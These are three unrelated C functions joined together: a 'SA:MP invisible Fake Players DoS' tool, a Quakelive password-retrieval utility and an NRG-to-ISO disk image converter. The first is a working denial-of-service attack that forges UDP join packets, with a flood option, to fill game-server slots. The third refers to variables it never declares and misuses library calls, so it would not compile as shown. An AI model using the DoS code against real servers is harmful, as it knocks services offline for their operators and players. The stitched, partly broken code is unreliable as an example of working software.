int main(int argc, char *argv[]) { struct sockaddr_in peer, peerl; struct linger ling = {1,1}; int sd, i, len, ver = 1, z = 0, flood = 0, full = 0, joined = 0; u16 port = PORT; u8 *buff, pass[128], *host, *p; #ifdef WIN32 WSADATA wsadata; WSAStartup(MAKEWORD(1,0), &wsadata); #endif setbuf(stdout, NULL); fputs("\n" "SA:MP invisible Fake Players DoS "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "edit: by Hordejoy\n" "\n", stdout); if(argc < 2) { printf("\n" "Usage: %s [options] <host[:port]>\n" "\n" "-p PORT server port that you can specify also after host, default is %hu\n" "-f flooding option, perfect for slow connections or for testing servers\n" " with many slots\n" "\n", argv[0], port); exit(1); } argc--; for(i = 1; i < argc; i++) { if(((argv[i][0] != '-') && (argv[i][0] != '/')) || (strlen(argv[i]) != 2)) { printf("\nError: wrong argument (%s)\n", argv[i]); exit(1); } switch(argv[i][1]) { case 'p': { if(!argv[++i]) exit(1); port = atoi(argv[i]); } break; case 'f': { flood = 1; } break; default: { printf("\nError: wrong argument (%s)\n", argv[i]); exit(1); } } } host = argv[argc]; p = strchr(host, ':'); if(p) { *p = 0; port = atoi(p + 1); } peer.sin_addr.s_addr = resolv(host); peer.sin_port = htons(port); peer.sin_family = AF_INET; peerl.sin_addr.s_addr = INADDR_ANY; peerl.sin_port = htons(time(NULL)); peerl.sin_family = AF_INET; printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port)); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling)); buff = malloc(BUFFSZ + 1); if(!buff) std_err(); p = buff; p += putmm(p, "SAMP", 4); p += putxx(p, peer.sin_addr.s_addr, 32); p += putxx(p, ntohs(peer.sin_port), 16); p += putxx(p, 'i', 8); len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1, 0); close(sd); sampinfo(buff, len); pass[0] = 0; /* VERSION */ ver = 6; // remember to change this one with new versions! /* VERSION */ printf("- start attack:"); for(;;) { printf("\n Player: "); sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); if(sd < 0) std_err(); setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling)); do { peerl.sin_port++; } while(bind(sd, (struct sockaddr *)&peerl, sizeof(peerl)) < 0); p = buff; switch(ver) { case 1: { z = 0; full = 0x14; joined = 0x12; p += putxx(p, 0x03, 8); break; } case 2: { z = 0; full = 0x13; joined = 0x0b; p += putxx(p, 0x0a, 8); break; } case 3: { z = 1; full = 0x1d; joined = 0x10; p += putxx(p, 0x0f, 8); break; } case 4: { z = 1; full = 0x1b; joined = 0x11; p += putxx(p, 0x10, 8); break; } case 5: { z = 0; full = 0x21; joined = 0x18; p += putxx(p, 0x17, 8); break; } case 6: { z = 0; full = 0x1b; joined = 0x12; p += putxx(p, 0x11, 8); break; } default: { printf("\nError: socket timeout, no reply received\n"); exit(1); break; } } p += putmm(p, pass, -1); len = p - buff; if(ver == 5) len = samp03_crypt(buff, len, port, 1, 0); if(ver >= 6) len = samp03_crypt(buff, len, port, 1, 1); len = send_recv(sd, buff, len, (flood == 2) ? NULL : buff, BUFFSZ, &peer, 0, z); close(sd); if(len < 0) { printf("\n- no reply I try with an older version\n"); ver--; continue; } if(flood == 2) { waitms(FLOODMS); continue; } // seems not used //if(ver == 5) len = samp03_crypt(buff, len, port, 0, 0); //if(ver >= 6) len = samp03_crypt(buff, len, port, 0, 1); if(buff[0] == full) { printf("server full"); sleep(ONESEC); continue; } if(buff[0] != joined) { if((buff[0] == 0x13) || (buff[0] == 0x19)) { // \wrong \not set // version 2 doesn't want a password eh eh eh cool! printf("\n- server is protected, insert the password:\n "); fgetz(pass, sizeof(pass)); continue; } printf("\n- unknown packet reply (%d)\n", buff[0]); //exit(1); } else { if(flood) { printf("\n- start flooding\n"); flood = 2; } } } return(0); }
int main(int argc, char *argv[]) { mydown_options opt; int len; u8 content[1024], *buff = NULL, *mail = NULL, *pass = NULL, *xaid; fputs("\n" "Quakelive xmpp.quakelive.com password retriever "VER"\n" "by Luigi Auriemma\n" "e-mail: [email protected]\n" "web: aluigi.org\n" "\n", stdout); if(argc < 3) { printf("\n" "Usage: %s [mail_address] [password]\n" "\n", argv[0]); //exit(1); } if(argc >= 2) mail = argv[1]; if(argc >= 3) pass = argv[2]; if(!mail) mail = strdup(fgetz("enter the mail address of the account")); if(!pass) pass = strdup(fgetz("enter the password of the account")); if(!strchr(mail, '@')) { printf("\nError: you must insert your account mail address, not the username\n"); goto quit; } memset(&opt, 0, sizeof(opt)); opt.verbose = 0; //-1; opt.filedata = &buff; opt.referer = "http://www.quakelive.com/"; opt.more_http = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" /*"X-Requested-With: XMLHttpRequest\r\n"*/; //snprintf(content, sizeof(content), "u=%s&p=%s&r=0", mail, pass); snprintf(content, sizeof(content), "submit=&email=%s&pass=%s", mail, pass); opt.get = "POST"; opt.content = content; printf("- send mail and password to %s\n", QLURL1); len = mydown(QLURL1, NULL, &opt); if((len < 0) /*|| !buff*/) { printf("\nError: something wrong on the quakelive.com webserver\n"); goto quit; } if(len > 0) buff[len - 1] = 0; // don't want to realloc for one byte /* if(!strstr(buff, "CODE\":0")) { if(len < 0) len = 0; printf("\n" "Error: seems that your account has not been accepted:\n" " %.*s\n", len, buff); goto quit; } */ free(buff); opt.get = "GET"; opt.content = NULL; opt.more_http = "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" "X-Requested-With: XMLHttpRequest\r\n"; printf("- get session informations from %s\n", QLURL2); len = mydown(QLURL2, NULL, &opt); if((len < 0) || !buff) { printf("\nError: something wrong on the quakelive.com webserver\n"); goto quit; } if(len > 0) buff[len - 1] = 0; // don't want to realloc for one byte xaid = strstr(buff, "\"XAID\":"); if(!xaid) { printf("\n" "Error: no XAID field found, check the reply received from the server\n" "\n" "%s\n" "\n", buff); } xaid = show_qldata(buff, len); /* xaid = strchr(xaid, ':') + 1; if(xaid[0] == '\"') { xaid++; l = strchr(xaid, '\"'); } else { l = strchr(xaid, ','); } if(l) *l = 0; */ printf( "- your current xmpp.quakelive.com password (XAID) is\n" "\n" " %s\n" "\n", xaid); free(buff); quit: fgetz("press RETURN to quit"); return(0); }
unsigned short exec() { char buffer[1024 * 1024]; size_t size = 0, l, i; size_t nrgSize; struct stat buf; FILE *nrgFile; #ifdef WIN32 mywnd = GetForegroundWindow(); if (GetWindowLong(mywnd, GWL_WNDPROC)) { p = argv[1]; argv = malloc(sizeof(char *) * 3); if (argc < 2) argv[1] = get_file(); else argv[1] = p; argv[2] = put_file(argv[1]); argc = 3; p = strrchr(argv[2], '.'); if (!p || (p && (strlen(p) != 4))) strcat(argv[2], ".iso"); } #endif if (filename) { // reading data from a file if (stat(filename, &buf) == 0) { // file exists nrgSize = buf.st_size; if (nrgSize < 1) { if (destfile) printf("%s: file '%s' is empty\n", __progname, filename); return -1; } if (!(nrgFile = fopen(filename, "rb"))) { if (destfile) printf("unable to open the source file %%s\n"); return -1; } char buffy[17*2048]; if (fread(buffy, 1, sizeof(buffy), nrgFile) != sizeof(buffy)) { if (destfile) printf("unable to read the source file %%s\n"); return -1; } if (is_iso(buffy)) { if (destfile) printf("%s: %s is already an ISO 9660 image\n", __progname, filename); if (destfile) printf("Nothing to do... exiting.\n"); return 1; } fseek(nrgFile, 307200, SEEK_SET); } else { // specified input file doesn't exist printf("%s: No such file '%s'\n", __progname, filename); return -1; } } else { // no files specified if (isatty(fileno(stdin))) { // stdin is a terminal printf("please specify an input file\n"); return 1; } else { // stdin is a file or a pipe // TODO: read first 17 sectors, test with is_iso, then skip next (307200 - 17*2048) bytes char buffy[17 * 2048]; fread(buffy, 1, sizeof(buffy), stdin); if (is_iso(buffy)) return 1; // skip first 307200 bytes of stdin int skip = 307200 - sizeof(buffy); while (skip--) fgetc(stdin); } } if (destfile && isatty(fileno(stdin))) { // write to a file FILE *isoFile; short percent; short old_percent = -1; isoFile = fopen(destfile, "wb+"); if (same_file(open(filename), open(destfile)) == 1) { printf("%s: the source and the destination files are the same\n", __progname); return -1; } while ((i = fread(buffer, 1, sizeof(buffer), (filename) ? nrgFile : stdin)) > 0) { if (fwrite(buffer, i, 1, isoFile) != 1) { printf("\n%s: cannot write to file %s\n", __progname, destfile); return -1; } size += i; percent = (int)(size * 100.0 / nrgSize); if (percent != old_percent) { old_percent = percent; printf("\r["); for (l = 0; l < percent * BAR_LENGTH / 100; l++) printf("="); printf(">"); l++; for (; l < BAR_LENGTH; l++) printf(" "); printf("] %d%%", percent); fflush(stdout); } } printf("\r["); for (l = 0; l < BAR_LENGTH; l++) printf("="); printf("] 100%%"); fflush(stdout); fclose(nrgFile); fclose(isoFile); printf("\n%s written: %lu bytes\n", destfile, size); } else { // stdout while ((i = fread(buffer, 1, sizeof(buffer), (filename) ? nrgFile : stdin)) > 0) fwrite(buffer, i, 1, stdout); } #ifdef WIN32 u8 ans[8]; if (GetWindowLong(mywnd, GWL_WNDPROC)) { printf("\nPress ENTER to quit"); fgetz(ans, sizeof(ans), stdin); } #endif return 0; }